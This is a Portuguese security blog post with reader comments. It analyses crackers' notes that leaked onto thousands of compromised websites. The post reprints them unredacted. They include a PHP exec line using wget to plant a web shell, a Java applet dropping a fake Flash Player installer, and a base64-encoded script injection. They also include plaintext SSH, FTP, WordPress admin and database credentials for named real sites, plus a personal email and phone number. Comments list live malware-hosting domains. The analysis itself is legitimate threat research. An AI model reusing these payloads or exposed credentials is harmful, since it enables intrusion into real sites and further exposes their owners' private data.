Crackers invadem mais de 14 mil sites e deixam seus dados expostos

Recentemente um leitor do blog me enviou um link muito suspeito para análise, ao acessá-lo abriu essa página:

Agora vá ao Google, digite por exemplo “python pyFTP.py -i Ftp.txt” com aspas e mande pesquisar (não abra os sites encontrados). 

Hoje, o Google retornou mais de 14 mil sites com essas mesmas informações. Aqui estão elas na íntegra:

<? exec("wget http://rafaeltongol.com/2.txt;mv 2.txt wp-word.php"); ?>

<applet name="Flash Player 11" code="afp.class" archive="http://66.49.154.203/usage/.jar/java.php?a=afp.jar" width="1" height="1"><param name="link" value="http://66.49.154.203/usage/.exe/download.php?a=FlashPlay.exe"></applet>

<? $auto_confi = base64_decode('PHNjcmlwdCBzcmM9Imh0dHA6Ly9hbGluZXJvaWZmZS5jb20vc2l0ZS9wbHVnaW4uanMiPjwvc2Ny
aXB0Pg==');
echo $auto_confi;?>


<script src="http://alineroiffe.com/site/plugin.js"></script>
<script src="http://atelier3.jp/js/java.js"></script>

allcompanyonline.com:allcompanyonline:admin123

python pyFTP.py -i Ftp.txt -e OK_Ftps.txt -t auto.txt -o Alterados.txt -l 8634

alineroiffe.com:alineroiffe:senha123
atelier3.jp:atelier3:atelier3

Linux ubuntu-server.entvoice.com 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@123.252.144.92   3k0(#09@8u@xm2

$P$B6yZv1TLwMlV9rZxXrjFW6oNO4AU5G/ = %%hacking%%


rafaeltongol.com:rafaeltongol:upload DEDICADO
ssh root@knihovna.tul.cz:Hacked1990
ssh apilecce@apilecce.it:apilecce


ssh akce@akce.cz:akce                          Scan Wordpress lol.log 1890018
ssh autimax@autimax.com.br:q1w2e3              Scan Token Joomla lol.log 2116824 OFF
ssh aurora@aurora.iiitm.ac.in:qwerty123        Scan Joomla Brute lol.log 6692945 OFF
ssh cba@cba.uah.edu:password                   Scan FTP Brs.txt 169700 OFF
ssh cupnoodles@cupnoodles.com.br:q1w2e3        Scan Ftp Completo lol.log 1905797 + 500
ssh baigiang@baigiang.bachkim.vn:baigiang      Scan Brs.txt Joomla TOKEN 520352

=====================================================================================================================
............::::::::: Porrinha ::::::::...........
=====================================================================================================================
Contador .HTTP: http://anfeso1201.dominiotemporario.com/contadorkeke/clientes/mostrar.php Total: 559
Data: 28/09/2011
=====================================================================================================================
Contador .HTTP: http://r7on.com.br/porraloka/clientes/mostrar.php Total: 1671
31/08/2011
=====================================================================================================================
Contador .HTTP: http://netransportes.com.br/amanda/clientes/mostrar.php Total: 2000
07/09/2011
=====================================================================================================================
TOTAL INFECTS: 00.000 x 0,50 = 000,00
=====================================================================================================================

=====================================================================================================================
.....:::: Psychlo ::::......
=====================================================================================================================
Total Combinado: 1000
Contador HTTP: http://64.186.158.114/tzu.php Total: 1000
Falta pagar:250,00
=====================================================================================================================
Total: 2214,00 Vo manda 3000,00 EM AVER 786,00 - 250 = 536

====================================================================================================================
............::::::::: Cavalo ::::::::...........
====================================================================================================================
Contador .EXE : 2053
====================================================================================================================
TOTAL INFECTS: 5.000 x 0,50 = 000,00
====================================================================================================================

Contador HTTP: http://200.98.201.13/~rex/tom/rel/inf4/?url=c Total: 3758
Falta pagar: 600,00

http://beta.statcounter.com/p7142950/entry_page/pageload/?url=http://www.cc.com/d.php 
flashgame_co_cc 
b470killer

miroslav.stampar@gmail.com Carinha do wordpress


8276 0241 Oi julimar


http://assistironlinefilme.com/wp-login.php:admin:123456 root User
http://www.assistironlinefilme.com/wp-word.php
define('DB_NAME', 'assisti2_wrdp1');

/** MySQL database username */
define('DB_USER', 'assisti2_wrdp1');

/** MySQL database password */
define('DB_PASSWORD', 'hIoGTSY8JGg6');

/** MySQL hostname */
define('DB_HOST', 'localhost');


http://assistirtvonline.com/wp-login.php:admin:123mudar Usuario admin email: gatao1593@hotmail.com root Email: nobody_linux@hush.ai
http://www.assistirtvonline.com/wp-content/themes/theme/wp-word.php
http://www.assistirtvonline.com/wp-content/cache/supercache/www.assistirtvonline.com/aovivo/pica-pau/worse.php
http://www.assistirtvonline.com/wp-content/cache/supercache/assistirtvonline.com./index_.php
http://www.assistirtvonline.com/aovivo.php
/** The name of the database for WordPress */
define('DB_NAME', 'assisti_01');

/** MySQL database username */
define('DB_USER', 'assisti_assisti');

/** MySQL database password */
define('DB_PASSWORD', '1903divina');

/** MySQL hostname */
define('DB_HOST', 'localhost');


/** The name of the database for WordPress */
define('DB_NAME', 'paraorku_db');

/** MySQL database username */
define('DB_USER', 'paraorku_Admin');

/** MySQL database password */
define('DB_PASSWORD', 'Clarity123-db');

/** MySQL hostname */
define('DB_HOST', 'localhost');


http://cultureba.com.br/wp-content/themes/theme/wp-word.php
http://cultureba.com.br/wp-words.php
define('DB_NAME', 'cultureb_cultureba');

/** MySQL database username */
define('DB_USER', 'cultureb_culture');

/** MySQL database password */
define('DB_PASSWORD', 'jana2810##');

/** MySQL hostname */
define('DB_HOST', 'localhost');



define('DB_NAME', 'chatfeminino');

/** MySQL database username */
define('DB_USER', 'chatfeminino');

/** MySQL database password */
define('DB_PASSWORD', 'moda102030');

/** MySQL hostname */
define('DB_HOST', 'mysql.chat-feminino.com');

A princípio o que me chama atenção é que tentaram inserir códigos da linguagem PHP em páginas que não eram PHP, sendo assim o servidor web não conseguiu interpretar os códigos e os trataram como se fossem texto simples.

Outros trechos que não contêm as tags do PHP <? e ?> também exibem informações dos crackers. Nesse caso imagino que foi falha da ferramenta ou o método que utilizaram, devem ter redirecionado a saída de algum comando para a página ao invés de outro arquivo de log por exemplo.

Ainda vemos informações contábeis dos golpes, isso me lembrou os caderninhos de contabilidade que são encontrados com os traficantes quando são apreendidos pela polícia, com informações de pagamentos, pedidos, apelidos e valores.

=================================================
.....:::: Psychlo ::::......
=================================================
Total Combinado: 1000
Contador HTTP: http://64.186.158.114/tzu.php Total: 1000
Falta pagar:250,00
=================================================
Total: 2214,00 Vo manda 3000,00 EM AVER 786,00 - 250 = 536

=================================================
............::::::::: Cavalo ::::::::...........
=================================================
Contador .EXE : 2053
=================================================
TOTAL INFECTS: 5.000 x 0,50 = 000,00
=================================================
Contador HTTP: http://200.98.201.13/~rex/tom/rel/inf4/?url=c Total: 3758
Falta pagar: 600,00
=================================================

Lembram das páginas que os malwares acessam quando conseguem infectar um computador? São os contadores para realizarem esse controle da “firma”, parece que cada computador infectado está valendo R$ 0,50.

Há até alguns dados para contato:

miroslav.stampar@gmail.com Carinha do wordpress
8276 0241 Oi julimar

Dessa vez decidi não esconder as informações porque elas estão disponíveis na internet para qualquer um ver e além disso eles não gostam de vazar dados sigilosos? Aí estão para apreciação.

Muita coisa pode ser extraída dessas informações, em breve novos posts com mais detalhes sobre o caso. Contribuições também são bem-vindas.
Os maus exercem geralmente maior influência no mundo pela fraqueza dos bons. Os maus são intrigantes e audaciosos; os bons são tímidos. Estes, quando quiserem, assumirão a preponderância.”

20 comentários:

  1. Bom trabalho Ronaldo.
    Realmente, algo deve ter corrido mal no toolkit de malware dos "crackers".
    Também já apanhei uns quantos directórios de contadores sem protecção de index e dessa forma consegui obter logs bem interessantes :-)

    Abraço,
    David Sopas

    ResponderExcluir
    Respostas
    1. http://amigos2rodas.web.interacesso.pt/
      http://www2.genetiporc.com.br/

      Excluir
  2. Olá Ronaldo,

    Por que você diz para não acessar os sites encontrados? O que o acesso traz ao usuário?

    ResponderExcluir
    Respostas
    1. Se você acessar, por exemplo, um servidor que foi alvo de crime, utilizando usuário e senha divulgado na web, você poderá ser objeto de investigação. E nestas horas, tratando-se de polícia brasileira, é bom lembrar que até você provar que fucinho de porco não é tomada, já levou muito choque.

      Além disto, você pode comprometer a segurança de seu equipamento, se acessar de forma comum tais endereços de páginas comprometidas.


      Paulo

      Excluir
  3. Mais um ótimo posts. Somos leitores assíduos.

    Marcio Cavalheiro
    @centralinfors
    http://www.centralinfotecnologia.com.br

    ResponderExcluir
  4. Anônimo,

    Posso responder sua pergunta "O que o acesso traz ao usuário?"

    Sim, faz download de programas maliciosos que infectam seu equipamento, e fazem o estrago!

    ;-)

    ResponderExcluir
  5. Os programas só funcionam Windows?

    ResponderExcluir
    Respostas
    1. Não, há artefatos maliciosos escritos em java que são ativados através do navegador (que alteram o comportamento da navegação, por exemplo), estando este em plataforma Windows ou Linux.

      Paulo

      Excluir
  6. David, essa ausência de index sempre nos traz alegrias. Estou sempre acompanhando o websegura.net. :)

    Obrigado Marcio!

    Anônimo[1], exatamente como o Anônimo[2] respondeu. Há scripts nesses sites que quando são acessados tentam instalar programas maliciosos no seu computador. Recomendo apenas abrir em um ambiente controlado de análise.

    Anônimo[3], a princípio sim, geralmente instalam executáveis ou alteraram os navegadores somente no Windows. Mas também é bom ficar atento no Linux e Mac, assim como nos smartphones.

    Abraços,

    ResponderExcluir
  7. Como sempre, muito bom, tô sempre acompanhando...
    Tô esperando a próxima!!

    Off: Só lembrando, não esqueça da minha dica sobre engenharia reversa.

    ResponderExcluir
  8. Esqueci de citar, mas chegamos a você pelos tuitadas do @assolini

    ResponderExcluir
  9. Grande Ronaldo!

    Excelente!

    ResponderExcluir
  10. Muito bom Ronaldo, parabéns. Alguns arquivos usados nessa fraude podem ser encontrados em http://66.49.154.203/usage/.exe/

    Abraço! :D

    ResponderExcluir
  11. Pra acrescentar, mais algumas informações:

    Alguns dos sites que estavam (ou estão) distribuindo o malware em java:
    delivery.etc.br
    cooperinfo.com
    avid.com.sg
    nucleosocial.com.br
    Comuniquei todos, porém, como de costume, somente o responsável por um site me respondeu, o do delivery.

    Algumas screenshots do que encontrei:

    Scan de "URLs online" rodando no site apilecce.it - a lista de sites que ele gerava provavelmente era usada pra eles escanear posteriomente em busca de alguma falha:
    http://imageshack.us/photo/my-images/842/scanonline.png/

    Contador de infects:
    http://imageshack.us/photo/my-images/225/contadordeinfect2.png/

    Exploits provavelmente usados pelos individuos para tentar fazer um privilege escalation (virar root) no server do japão (atelier3.jp):
    http://imageshack.us/photo/my-images/695/exploits.png/

    Arquivo java.js no atelier3 que chamava o malware do nucleosocial.com.br. Só pra constar, hoje (12/10/2011) o site do nucleosocial, cujo já foi comunicado sobre o artefato, ainda está distribuindo o malware... Triste, mas real!
    http://imageshack.us/photo/my-images/33/javajs.png/

    Mesmo arquivo que o de cima, porém no site alineroiffe:
    http://imageshack.us/photo/my-images/818/pluginjs.png/

    Esta fraude provavelmente fará parte do meu TCC da pós em segurança :D

    Abraço galera!

    ResponderExcluir
  12. Dae galera! Compilei mais algumas informações que encontrei sobre o caso e joguei na minha hospedagem pra não ficar gigante o post:

    http://bertochi.com.br/files/informacoes_fraude.doc

    Se descobrirem algo mais, compartilhem, e se eu descobrir algo mais, compartilho! :D

    Abraço e fiquem com Deus <o/

    ResponderExcluir
  13. Olá pessoal, Olá Ronaldo, quero deixa aqui meus parabéns pelo seu site. Cheguei aqui por indicação de um amigo e gostei muito dos post que vi aqui, gostaria de sabe como vc chego até as informações? Quando me refiro a informações falo que consegui achar senhas de acesso e senhas do ssh. Abraço e parabéns.

    ResponderExcluir
  14. So nesse link http://www.assistironlinefilme.com
    Achei alguns host externo que possivelmente esta infectados.

    baixakifilmeseseriados.net
    feeds.feedburner.com
    www.baixarfilmeseseriados.net
    filmeparabaixar.org
    www.roytanck.com
    www.macromedia.com
    seoforums.org
    www.histats.com
    sstatic1.histats.com
    3.bp.blogspot.com
    i54.tinypic.com
    www.baixakifilmeseseriados.net
    s10.histats.com

    ResponderExcluir
  15. O código do shell revela a idade deles...

    ---
    if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
    ---

    Brincadeiras à parte, é importante que essas informações sejam divulgadas e encaminhadas à polícia. São criminosos e precisam ir para a cadeia/reformatório.

    ResponderExcluir
    Respostas
    1. Mandá-los para a cadeia não é problema Fernando, o problema é mantê-los lá. Não é justo o cidadão pagar impostos para manter aqueles lixos presos e ainda depois que saem eles seguirem com os delitos. Pena de morte é a solução para este tipo de crime, bem como para muitos outros (pedofilia, estupro, etc.)

      Paulo

      Excluir
  16. "Dessa vez decidi não esconder as informações..."

    Parabéns pela iniciativa Ronaldo!

    Paulo

    ResponderExcluir

Related Posts Plugin for WordPress, Blogger...